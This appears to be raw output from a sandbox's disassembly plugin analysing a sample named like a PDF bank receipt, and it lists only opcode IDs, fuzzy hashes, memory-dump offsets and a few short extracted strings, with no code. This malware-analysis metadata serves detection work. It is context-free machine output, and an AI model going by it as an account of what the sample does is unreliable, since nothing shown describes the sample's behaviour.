                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f9e6ffcf7b683baed1b4760044c5197dc5c136e435e0612e28b21e3b76779074
                                                                                                                                                          • Instruction ID: c108e2df1f8aa3b69fb874f4f52968d3fc155f9388c3a6d587dc7175d5daf62f
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b71371a318b4e7d5c15dec209281d749ea0ac389d97b6ff0e84d3c35b426be1b
                                                                                                                                                          • Instruction ID: 8e374d8321914d7bfff08e5251aaeb62199ca9dbeaf4f27c4f74d3b3a3585b98
                                                                                                                                                          • Opcode Fuzzy Hash: b71371a318b4e7d5c15dec209281d749ea0ac389d97b6ff0e84d3c35b426be1b
                                                                                                                                                          • Instruction Fuzzy Hash: D4F0B47050E3899EEB225328841532A7F64EF02308F19C4EBD64C8BA53CA27C847C796
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5c0b82a5b1f85edf3b23316b746a31d967d70e7e8ea386d06a9beed3a820af9c
                                                                                                                                                          • Instruction ID: bc157304320a1b97b376f23d72541adafe7a2036021e03d2691730cc0df81868
                                                                                                                                                          • Opcode Fuzzy Hash: 5c0b82a5b1f85edf3b23316b746a31d967d70e7e8ea386d06a9beed3a820af9c
                                                                                                                                                          • Instruction Fuzzy Hash: 24018C71D092889FC741CFA98455658BFF0EF0A210F0580DBD854DB372E7389600CB52
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cc07438bfc734b3eea61451711a12c3c1acba2ff5228aaf2df91a66ea01f7cc7
                                                                                                                                                          • Instruction ID: 4643d37d7e501133388996fc0a8566081203869e61489d721f487ffaf114605f
                                                                                                                                                          • Opcode Fuzzy Hash: cc07438bfc734b3eea61451711a12c3c1acba2ff5228aaf2df91a66ea01f7cc7
                                                                                                                                                          • Instruction Fuzzy Hash: 74F08232A04208AFEB08DF98DC0299E7FFAEB99210F1481ABE404DB261E731DD108795
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a06ad7ec618fdd5fc02d0efc619a99a5cfabb1a0c311b62fe8125733f491a647
                                                                                                                                                          • Instruction ID: f94543b0771c012c6f937e5bd79db869137d64418671282510f2d6f8ec0005b3
                                                                                                                                                          • Opcode Fuzzy Hash: a06ad7ec618fdd5fc02d0efc619a99a5cfabb1a0c311b62fe8125733f491a647
                                                                                                                                                          • Instruction Fuzzy Hash: 88F08C797461408FCF01DF28E846DE43BB0EA4622030011AAE504CB732D628EC46CB61
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bbed106006b1c4eab6cff456c68eb1419ae342a89773bdf7b66a7a136eb2dfb8
                                                                                                                                                          • Instruction ID: 6a7b8a345ccf9aaf8ed37c5e7d9b1299b86a9bafe97501b77ee0b1c7a5d9f2bc
                                                                                                                                                          • Opcode Fuzzy Hash: bbed106006b1c4eab6cff456c68eb1419ae342a89773bdf7b66a7a136eb2dfb8
                                                                                                                                                          • Instruction Fuzzy Hash: 2BF027373002889FCB02CF68F501AEEBFA5EB85211B044457F149C7162CB359910E765
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ab83a5f61a1546c5e3cb8b739c696129bdece15e7672af728cd391b53f611c24
                                                                                                                                                          • Instruction ID: fd82d58b6a50113acbe154e73dc55b9eedc9a51634ddbe8e4e2d8843a437d48f
                                                                                                                                                          • Opcode Fuzzy Hash: ab83a5f61a1546c5e3cb8b739c696129bdece15e7672af728cd391b53f611c24
                                                                                                                                                          • Instruction Fuzzy Hash: 99F0F4B8D0520A9FCB54DFA9D5066AEBBF5EB48310F0080AA9818E3390EB745A00CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1c3a4d2873c0798eaf5df2b6a0cedf64a7edb398cbdf934f9da547797359cd77
                                                                                                                                                          • Instruction ID: 97443b7e5cb07b4e42b5c27e8edf89dfe526988d237266b57fd0b661e16c26a0
                                                                                                                                                          • Opcode Fuzzy Hash: 1c3a4d2873c0798eaf5df2b6a0cedf64a7edb398cbdf934f9da547797359cd77
                                                                                                                                                          • Instruction Fuzzy Hash: B4F0F934E4420ECFCB14CFA8D844AADBBF9FB45305F008565D825D7369E730D9468B91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b04d2e7d64fa190882e67a3d7ae3318246239a3e548402c272b1e2e20e62d090
                                                                                                                                                          • Instruction ID: 8b39b21b9d26e2f360df6d11510e5fe0c4af2fc9cd69f3c6b6c2003f5c83a5db
                                                                                                                                                          • Opcode Fuzzy Hash: b04d2e7d64fa190882e67a3d7ae3318246239a3e548402c272b1e2e20e62d090
                                                                                                                                                          • Instruction Fuzzy Hash: 92F03A70E4020A8BDB14EFB9C5587ADBAB6BF84744F04443DD202AB294DFB55880CFA5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8bbd403c1f13e7b658c5c285ce40552113675f3b2bd4331dcf04b8c44064199c
                                                                                                                                                          • Instruction ID: a6f3d6fb4cb3476fb273d5f17f3307ed9d18f50e9408305ad5ce041f611757c2
                                                                                                                                                          • Opcode Fuzzy Hash: 8bbd403c1f13e7b658c5c285ce40552113675f3b2bd4331dcf04b8c44064199c
                                                                                                                                                          • Instruction Fuzzy Hash: 29E09270A083059B8A349A159888877B7BEEB843903004A2EEA4AC3B10EA21F845C7A4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b7d8ee89e4df2c2de9f472c62474aded12458eaab7fe5c073d6a342220b8e4b2
                                                                                                                                                          • Instruction ID: 46d17b1f17ca05ac6048ee87f84cb86e97514746c669da55224629989b0bdd8b
                                                                                                                                                          • Opcode Fuzzy Hash: b7d8ee89e4df2c2de9f472c62474aded12458eaab7fe5c073d6a342220b8e4b2
                                                                                                                                                          • Instruction Fuzzy Hash: 19F0CF34949229DFDB14CF98D980BA8BBB5BB4A215F000696D429E7394D3309E418F11
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c355a900fceba9843e95b1c378e738c97f9384a86d47fd54bef2257b78d06ca9
                                                                                                                                                          • Instruction ID: 6bd0aace9ff4543a7c4260904decfbb955ab1cc7144a106ef421569c7ea113b6
                                                                                                                                                          • Opcode Fuzzy Hash: c355a900fceba9843e95b1c378e738c97f9384a86d47fd54bef2257b78d06ca9
                                                                                                                                                          • Instruction Fuzzy Hash: 64E0B672F001146F9B08DEA998449AFBAFB9B84654B11857AA509D7258EA30AD4187D0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a7db9668a01ce9622d954956453482b5a33ab66700e81de78bd688ddc8a94521
                                                                                                                                                          • Instruction ID: 8979700f9d53f4f5721af8d77d0c2b7b580b5fde9897e7bbde398d7333a665cf
                                                                                                                                                          • Opcode Fuzzy Hash: a7db9668a01ce9622d954956453482b5a33ab66700e81de78bd688ddc8a94521
                                                                                                                                                          • Instruction Fuzzy Hash: 7EE092323001486FCB019E4EE800E9FBFEEDBC8310B04801AF949C3221CB75D81197A5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 012c0cb9c34f3c4d1d358b618d0f6e014b0f61e22c0f503c0ca59db0eab9171b
                                                                                                                                                          • Instruction ID: 6bf2f6ab06190cc35c59bfedd8c49dd064912806da44120f491f3e68781a06d9
                                                                                                                                                          • Opcode Fuzzy Hash: 012c0cb9c34f3c4d1d358b618d0f6e014b0f61e22c0f503c0ca59db0eab9171b
                                                                                                                                                          • Instruction Fuzzy Hash: B2E0E2B0E0020EAFCB80EFA9D44569CBBF4AB08300F0080AA9818E3350EB385A54DF81
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 16dd48c7484da874b1b1753fb7634a330cb7f6616a4167f68039d10a4ae824f6
                                                                                                                                                          • Instruction ID: 65bf22de851fa340f90d443610f12ec12533b866344eb2b087ccc90e41124242
                                                                                                                                                          • Opcode Fuzzy Hash: 16dd48c7484da874b1b1753fb7634a330cb7f6616a4167f68039d10a4ae824f6
                                                                                                                                                          • Instruction Fuzzy Hash: 09E01235209285AFC7429BA588989547F35AF0B724B15D186F6888E193C3324566DB11
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 50d9df1bd31ca29fca1c0432cd7aa7f00cb6c21b7d667ed7d379317241af8da3
                                                                                                                                                          • Instruction ID: 48582f82aa162ae37ef228720aec848591a5fbf5ec79b80429dcffc3185626e4
                                                                                                                                                          • Opcode Fuzzy Hash: 50d9df1bd31ca29fca1c0432cd7aa7f00cb6c21b7d667ed7d379317241af8da3
                                                                                                                                                          • Instruction Fuzzy Hash: 57D0A970A0120EDBCB40EBB8E90669DBBB89B00200F1041F89808A3260FB301F00DB92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 88393e5d119cb97b445980ca0cd788536ef14f6c83aac8334e92f46cfb57148d
                                                                                                                                                          • Instruction ID: 85bd31f3551d5cf178bd9c320151881475c34836e6f944e9305e642f2e58db4b
                                                                                                                                                          • Opcode Fuzzy Hash: 88393e5d119cb97b445980ca0cd788536ef14f6c83aac8334e92f46cfb57148d
                                                                                                                                                          • Instruction Fuzzy Hash: 7CD0C9B090620CEFC758EAA994056597769EB02215F1440A8940453260DB765A44DB92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f160e7a428e386061b463203445df7a8e40371780ba43ef22b718668a9d50d6e
                                                                                                                                                          • Instruction ID: c6cccf0490d9dc9bd41d1e7e9c5d882f02c9e22781f487f3846fe773134561bd
                                                                                                                                                          • Opcode Fuzzy Hash: f160e7a428e386061b463203445df7a8e40371780ba43ef22b718668a9d50d6e
                                                                                                                                                          • Instruction Fuzzy Hash: 79D0A7301492C09FC316ABECF51D2083F709B07316B060096F145CF0B2C7748481DF22
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 81ce5ac34926fa97c7fb5069e973a876abd4e0dcaaa1392278af8c7ec944a619
                                                                                                                                                          • Instruction ID: 1477c96f1446054a49e69716fa125a51f9b0c53bb60599027fb46041b5bc1921
                                                                                                                                                          • Opcode Fuzzy Hash: 81ce5ac34926fa97c7fb5069e973a876abd4e0dcaaa1392278af8c7ec944a619
                                                                                                                                                          • Instruction Fuzzy Hash: A9D02331E0956147C311070C7404449BFF4DDCE36131541FFED08C3241EB150811C7D5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 14e5a51cd1567d284398726b15259cb9b429cb39ddea8b2b00bf148f1a3d3791
                                                                                                                                                          • Instruction ID: a6ccd20f242801812bbfd0baf564aa8f700f65f6984e1f496e075d8418494ea7
                                                                                                                                                          • Opcode Fuzzy Hash: 14e5a51cd1567d284398726b15259cb9b429cb39ddea8b2b00bf148f1a3d3791
                                                                                                                                                          • Instruction Fuzzy Hash: 7AE042B5E4010ACFD700DF64D59AAADBBB1BB08718F208459D516AB261CB746844DF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4bebd6cbdb22416a8f94fd3b21d9233c6a7ddbb1dbf8117263184a95e2fd4bf0
                                                                                                                                                          • Instruction ID: ef8ea3c7c547320ddd7f248552230d5626b8b90645a3eb648381f53afda0fc8b
                                                                                                                                                          • Opcode Fuzzy Hash: 4bebd6cbdb22416a8f94fd3b21d9233c6a7ddbb1dbf8117263184a95e2fd4bf0
                                                                                                                                                          • Instruction Fuzzy Hash: D7D092345042A8CFD714DF25D998BAA7776FF8A706F415499E01BAB2A1CB709C81CF12
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8f1cde15990fcb145ae6cf1de37c2e2944375e3f09939e29e24039c76f16ec18
                                                                                                                                                          • Instruction ID: f8ef038cf4c8b6cb59bc026d60e544bed7794572623f6b78c0bf3a144e90ab07
                                                                                                                                                          • Opcode Fuzzy Hash: 8f1cde15990fcb145ae6cf1de37c2e2944375e3f09939e29e24039c76f16ec18
                                                                                                                                                          • Instruction Fuzzy Hash: 11C01236200208AFDA80AA94C880D667769AB08B14F50D044FA080A201C272EA62DBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 682fd86c56d7e76fbbe1f310ba332739b3f39d16b42b7d6e4c6184a324dc769f
                                                                                                                                                          • Instruction ID: 31dc6e1a0d6c7abcf4c128b4294755b95c0ca96ca083d0a4920a1ba137a6b063
                                                                                                                                                          • Opcode Fuzzy Hash: 682fd86c56d7e76fbbe1f310ba332739b3f39d16b42b7d6e4c6184a324dc769f
                                                                                                                                                          • Instruction Fuzzy Hash: BAC08C700462488FC70437E8B40C32876A89702316F004010F608820A08B708081DA63
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d0bb8d1f9e6135626548bae8b98b01f081158cb172be279e8e88cea9a744b89e
                                                                                                                                                          • Instruction ID: 08d21772048be911b1d01060a085278de0f26ee4469a99ef3e2b1a64950bafaa
                                                                                                                                                          • Opcode Fuzzy Hash: d0bb8d1f9e6135626548bae8b98b01f081158cb172be279e8e88cea9a744b89e
                                                                                                                                                          • Instruction Fuzzy Hash: 95C0927841E2814FCB224B92C9A91107F74BE032603AA10C2DE94C7277EB248A34CBA3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 18'$aY
                                                                                                                                                          • API String ID: 0-535677718
                                                                                                                                                          • Opcode ID: af76a8345623e69086df7d1f065e64bd13b84d643e9e1db5206960204b9f6cdc
                                                                                                                                                          • Instruction ID: 779bb17f6ba8b1db9c6a9b266a25cdf97f8ed048291263c60f32eb3655b79f0f
                                                                                                                                                          • Opcode Fuzzy Hash: af76a8345623e69086df7d1f065e64bd13b84d643e9e1db5206960204b9f6cdc
                                                                                                                                                          • Instruction Fuzzy Hash: 1961A1B4E0120ECFCB04CF99D581AAEBBB1BF89310F19855AD415EB325D734A9828F95
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 9Vkg$S->6
                                                                                                                                                          • API String ID: 0-948030788
                                                                                                                                                          • Opcode ID: bd0f4370e05dd7374438b35fda24fb40bd5a9ceb7cddd39e40f848697ce9a33b
                                                                                                                                                          • Instruction ID: fed59784c71c0d25bbb266dc4a6db4c8ecb68e55d55b82450aec055354221bcf
                                                                                                                                                          • Opcode Fuzzy Hash: bd0f4370e05dd7374438b35fda24fb40bd5a9ceb7cddd39e40f848697ce9a33b
                                                                                                                                                          • Instruction Fuzzy Hash: 2D411870E0620ADFCB88CFA9C9855EEFBF2EF88310F14D46AC915A7255E7349A418F54
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 9Vkg$S->6
                                                                                                                                                          • API String ID: 0-948030788
                                                                                                                                                          • Opcode ID: 890f516d3dda2fdc0b5a7627ef2f3f7dc3213e61a62f0deb611c94d51b8fedf6
                                                                                                                                                          • Instruction ID: 795db960c06d51582c31d83fd5d4e9406523ddbbc99efab955266950aa41e313
                                                                                                                                                          • Opcode Fuzzy Hash: 890f516d3dda2fdc0b5a7627ef2f3f7dc3213e61a62f0deb611c94d51b8fedf6
                                                                                                                                                          • Instruction Fuzzy Hash: 9941F9B0E0620ADBCB44CFA9D9845EEFBF2BF88310F14D569C519B7214E7349A418F54
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: d59$d59
                                                                                                                                                          • API String ID: 0-974283460
                                                                                                                                                          • Opcode ID: 6d2be1bdc59754d01bda5a3cb44a4de73e9a77346815af0b15991f2ad2490275
                                                                                                                                                          • Instruction ID: e23a6ff95c98c7a995a2b00cccef1918e940e0255de8b794b8d73a1442de142d
                                                                                                                                                          • Opcode Fuzzy Hash: 6d2be1bdc59754d01bda5a3cb44a4de73e9a77346815af0b15991f2ad2490275
                                                                                                                                                          • Instruction Fuzzy Hash: 7E211EB0E11619DBDB18CFAAD8416AEF7B7FFC8210F14C06AD609A7254DB305A418F51
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: d59$d59
                                                                                                                                                          • API String ID: 0-974283460
                                                                                                                                                          • Opcode ID: e72bc8b2dd3a205458473674335c8dce3cd8d5008e3d46c118186d2a83ea2a66
                                                                                                                                                          • Instruction ID: 028d3b69cc3afeb7d92841e3797a9762dce9f1909f808228cc7511f058e9eff4
                                                                                                                                                          • Opcode Fuzzy Hash: e72bc8b2dd3a205458473674335c8dce3cd8d5008e3d46c118186d2a83ea2a66
                                                                                                                                                          • Instruction Fuzzy Hash: 79215EB0E11219CBDB19CFAAD9406AEFBB3BF89200F14C06AD508F7355DA304A45CF51
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ]]o
